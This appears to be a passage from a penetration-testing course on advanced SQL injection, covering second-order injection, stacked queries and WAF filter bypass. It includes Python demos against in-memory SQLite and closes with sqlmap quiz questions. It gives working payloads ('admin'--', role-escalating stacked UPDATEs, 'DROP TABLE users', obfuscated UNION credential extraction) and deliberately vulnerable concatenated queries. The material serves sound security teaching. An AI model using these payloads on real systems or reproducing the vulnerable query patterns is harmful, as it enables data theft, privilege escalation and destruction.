
Beyond fundamental injection techniques lies a realm of sophisticated attacks that bypass common defenses and exploit complex application architectures. Understanding these advanced techniques prepares you for the hardened applications you'll encounter in professional testing.
First-order injection occurs when malicious input is executed against the database in the same request that delivers it. Second-order injection separates delivery from execution: the payload is stored without doing any harm, then executes later when the application reuses the stored value to build a different query.
Consider a registration form that parameterizes or escapes the username before storing it. The payload reaches the database intact, as data, because that first query was handled safely. Later, an administrative or profile function reads the username back and concatenates it into a different query, trusting the value because it came from the database rather than from the user. The payload finally executes there, often in a more privileged context than the original input point.
Second-order attacks require understanding data flow through the application. Where does input appear later? What operations use stored data? Answering these questions reveals opportunities invisible to testers who only examine immediate input processing.
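The data flow described above, as an added example that is not part of the course material: a parameterized registration stores the username `admin'--` harmlessly, and a later password-change function re-reads it and concatenates it into an UPDATE. SQLite (via Python's `sqlite3`) stands in for the application database; the schema, account names and function names are constructed for this illustration.

```python
import sqlite3


def setup() -> sqlite3.Connection:
    """Constructed schema: one real admin account, nothing else."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (
            id INTEGER PRIMARY KEY,
            username TEXT NOT NULL,
            password TEXT NOT NULL,
            role TEXT NOT NULL
        );
        INSERT INTO users (username, password, role)
            VALUES ('admin', 'admin-secret', 'admin');
    """)
    return conn


def register(conn: sqlite3.Connection, username: str, password: str) -> int:
    """Registration uses bound parameters, so the first-order path is safe:
    the payload is stored verbatim as an ordinary string. Returns the row id."""
    cur = conn.execute(
        "INSERT INTO users (username, password, role) VALUES (?, ?, 'user')",
        (username, password),
    )
    conn.commit()
    return cur.lastrowid


def change_password_vulnerable(conn: sqlite3.Connection, user_id: int, new_password: str) -> None:
    """Second-order sink: the stored username is trusted because it 'came from
    the database' and is concatenated into a new UPDATE statement."""
    (username,) = conn.execute(
        "SELECT username FROM users WHERE id = ?", (user_id,)
    ).fetchone()
    # With username admin'-- this becomes:
    #   UPDATE users SET password = 'pwned' WHERE username = 'admin'--'
    # and the comment swallows the closing quote, so the admin row is updated.
    query = f"UPDATE users SET password = '{new_password}' WHERE username = '{username}'"
    conn.execute(query)
    conn.commit()


def change_password_safe(conn: sqlite3.Connection, user_id: int, new_password: str) -> None:
    """Same operation with the stored value bound as a parameter again:
    the username is data, so only the attacker's own row changes."""
    (username,) = conn.execute(
        "SELECT username FROM users WHERE id = ?", (user_id,)
    ).fetchone()
    conn.execute(
        "UPDATE users SET password = ? WHERE username = ?", (new_password, username)
    )
    conn.commit()


def password_of(conn: sqlite3.Connection, username: str) -> str:
    (pw,) = conn.execute(
        "SELECT password FROM users WHERE username = ?", (username,)
    ).fetchone()
    return pw


def demo() -> dict:
    """Run the same registration-then-change flow against both sinks and
    report the admin's and the attacker's passwords afterwards."""
    payload = "admin'--"  # harmless at insert time, live at the second query
    results = {}
    for label, change in (("vulnerable", change_password_vulnerable),
                          ("safe", change_password_safe)):
        conn = setup()
        uid = register(conn, payload, "irrelevant")
        change(conn, uid, "pwned")
        results[label] = {
            "admin_password": password_of(conn, "admin"),
            "attacker_password": password_of(conn, payload),
        }
    return results


if __name__ == "__main__":
    print(demo())
```

The vulnerable path changes the real admin's password while leaving the attacker's own row untouched, because the `--` removes the closing quote and the WHERE clause matches only `admin`. Auditing for second-order injection therefore means tracing every query that reads a column back and uses it to build SQL, not just the request handlers that accept input.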
Some database configurations and drivers allow multiple statements in a single query, separated by semicolons. This enables attacks far more powerful than standard injection because you can execute entirely new statements rather than merely modifying existing ones.
Injecting '; DROP TABLE users-- doesn't modify the original query's logic; it terminates that query and starts a completely new one. This opens possibilities like INSERT statements to add administrative users, UPDATE statements to modify passwords, or DROP statements to destroy data.
Not every driver lets an application send stacked queries, even when the database engine itself can run them. PHP's old mysql extension refused multiple statements in mysql_query(); mysqli accepts them only through mysqli_multi_query(), while PDO's MySQL driver accepts them by default in query() and exec(). Microsoft SQL Server accepts batches of statements through most drivers, PostgreSQL does through libpq's simple-query path, and Oracle through its common drivers does not. Whether a stacked payload runs therefore depends on the API call the application made as much as on the database, and only testing reveals it.
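The driver dependence described above, as an added example that is not part of the course material: the same concatenated query is sent through two APIs of Python's `sqlite3` module. `cursor.execute()` refuses a string that holds more than one statement, so the injected UPDATE never runs; `executescript()` runs every statement it is given, so it does. SQLite stands in for whichever engine the target uses; the schema and names are constructed for the illustration.

```python
import sqlite3


def setup() -> sqlite3.Connection:
    """Constructed schema: one admin and the attacker's own low-privilege account."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT PRIMARY KEY, role TEXT NOT NULL);
        INSERT INTO users VALUES ('alice', 'admin'), ('mallory', 'user');
    """)
    return conn


# The application closes the string literal with its own quote, so the payload
# leaves the final quote open; the injected UPDATE is a complete second statement.
PAYLOAD = "x'; UPDATE users SET role = 'admin' WHERE username = 'mallory"


def build_query(username: str) -> str:
    """The vulnerable concatenation shared by both code paths."""
    return f"SELECT role FROM users WHERE username = '{username}'"


def current_role(conn: sqlite3.Connection, username: str) -> str:
    (role,) = conn.execute(
        "SELECT role FROM users WHERE username = ?", (username,)
    ).fetchone()
    return role


def role_via_execute(conn: sqlite3.Connection, username: str) -> str:
    """cursor.execute() runs exactly one statement and rejects a trailing one
    ("You can only execute one statement at a time."), so the attack fails."""
    try:
        conn.execute(build_query(username)).fetchall()
    except (sqlite3.Warning, sqlite3.Error):
        pass  # older Pythons raise sqlite3.Warning, newer ones ProgrammingError
    return current_role(conn, "mallory")


def role_via_executescript(conn: sqlite3.Connection, username: str) -> str:
    """executescript() runs every statement in the string, so the UPDATE executes."""
    conn.executescript(build_query(username))
    return current_role(conn, "mallory")


def stacked_demo() -> dict:
    """Mallory's role after the same payload goes through each API."""
    return {
        "execute": role_via_execute(setup(), PAYLOAD),
        "executescript": role_via_executescript(setup(), PAYLOAD),
    }


if __name__ == "__main__":
    print(stacked_demo())
```

When a stacked payload produces an error or no effect, that tells you about the call the application used, not that the injection point is dead: the same point may still be exploitable with UNION, boolean or time-based techniques that stay inside a single statement.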
Modern applications often implement input filtering or deploy Web Application Firewalls to block SQL injection attempts. These defenses require bypass techniques rather than basic payloads.
Case manipulation works when a filter matches keywords case-sensitively, because SQL keywords are not: if SELECT is blocked, try SeLeCt or sElEcT. Inline comments can stand in for the whitespace a signature expects, so UNION/**/SELECT defeats a rule that looks for the literal string "UNION SELECT". Splitting a keyword itself (SEL/**/ECT) or inserting a null byte (SE%00LECT) only helps if the target's parser still reads the result as the keyword; that varies by database and version and must be verified, since fooling the filter is useless if the query then fails to parse. URL encoding, double encoding, and character-set tricks each have their place; double encoding in particular relies on the filter decoding the parameter once while the application decodes it again.
Alternative syntax achieves the same goals with different tokens. Instead of UNION SELECT, try UNION ALL SELECT. OR can be replaced with || only where || is logical OR, as in MySQL's default sql_mode; in PostgreSQL and Oracle, || is string concatenation, so it will not serve as OR there. Conditions can be rewritten arithmetically (2>1 instead of 1=1), and string concatenation itself has several spellings: CONCAT() in MySQL and SQL Server, + in SQL Server, || in Oracle and PostgreSQL.
Understanding why filters fail helps you bypass them. Simple string matching misses encoding variations. Incomplete keyword lists miss synonyms and alternatives. Regex patterns have edge cases. The more you understand about filter implementation, the more effectively you can circumvent them.
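The filter failures described above, as an added example that is not part of the course material: a constructed, case-sensitive substring blocklist standing in for a naive WAF rule is run against four variants of one UNION payload, and each variant is then executed against a concatenated query and against a parameterized one. SQLite (via Python's `sqlite3`) stands in for the backend; the "double decoding" case assumes a deployment where the application URL-decodes the parameter a second time (for example, framework decoding plus an explicit `unquote()` in application code), which is an assumption of this example rather than a general rule.

```python
import sqlite3
from urllib.parse import quote, unquote

# Constructed blocklist standing in for a naive, case-sensitive WAF rule.
BLOCKED_SIGNATURES = ("UNION SELECT", "OR 1=1", "'--")


def naive_waf_blocks(raw_param: str) -> bool:
    """The filter URL-decodes the raw parameter once, then does plain substring matching."""
    seen = unquote(raw_param)
    return any(sig in seen for sig in BLOCKED_SIGNATURES)


def setup() -> sqlite3.Connection:
    """Constructed schema: a public table the query is meant to read and a secret one."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (title TEXT, body TEXT);
        INSERT INTO articles VALUES ('hello', 'public text');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cret');
    """)
    return conn


def vulnerable_search(conn: sqlite3.Connection, title: str) -> list:
    return conn.execute(
        f"SELECT title, body FROM articles WHERE title = '{title}'"
    ).fetchall()


def safe_search(conn: sqlite3.Connection, title: str) -> list:
    return conn.execute(
        "SELECT title, body FROM articles WHERE title = ?", (title,)
    ).fetchall()


# The trailing 'a'='a re-balances the quote the application adds at the end.
BASE = "x' UNION SELECT username, password FROM users WHERE 'a'='a"
PAYLOADS = {
    "plain": BASE,
    # SQL keywords are case-insensitive; the signature is not.
    "case": "x' UnIoN SeLeCt username, password FROM users WHERE 'a'='a",
    # SQLite treats a /**/ comment as whitespace; the signature wants a literal space.
    "comment_as_space": "x' UNION/**/SELECT username, password FROM users WHERE 'a'='a",
    # Assumed quirk: the app decodes twice, the WAF only once (see app_decode).
    "double_encoded": quote(quote(BASE, safe=""), safe=""),
}


def app_decode(raw_param: str) -> str:
    """Assumed application behaviour: two rounds of URL decoding."""
    return unquote(unquote(raw_param))


def leaks(rows: list) -> bool:
    return ("admin", "s3cret") in rows


def evaluate(raw_param: str) -> dict:
    """Does the filter stop the payload, and if not, does either query leak the secret?"""
    blocked = naive_waf_blocks(raw_param)
    value = app_decode(raw_param)
    conn = setup()
    return {
        "blocked": blocked,
        "leaks_with_concat": (not blocked) and leaks(vulnerable_search(conn, value)),
        "leaks_with_params": (not blocked) and leaks(safe_search(conn, value)),
    }


def run_all() -> dict:
    return {name: evaluate(p) for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    for name, outcome in run_all().items():
        print(f"{name:>16}: {outcome}")
```

Only the literal payload is stopped; every rewritten variant passes the filter and, against the concatenated query, returns the admin credentials. None of them returns anything against the parameterized query, which is the point to take away: a blocklist narrows the set of strings an attacker can send, while parameterization removes the interpretation step the attack depends on.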
What automated tool exploits SQLi?
What flag enumerates databases in sqlmap?
In what kind of environment should automated tools be avoided?
What sqlmap flag extracts table data?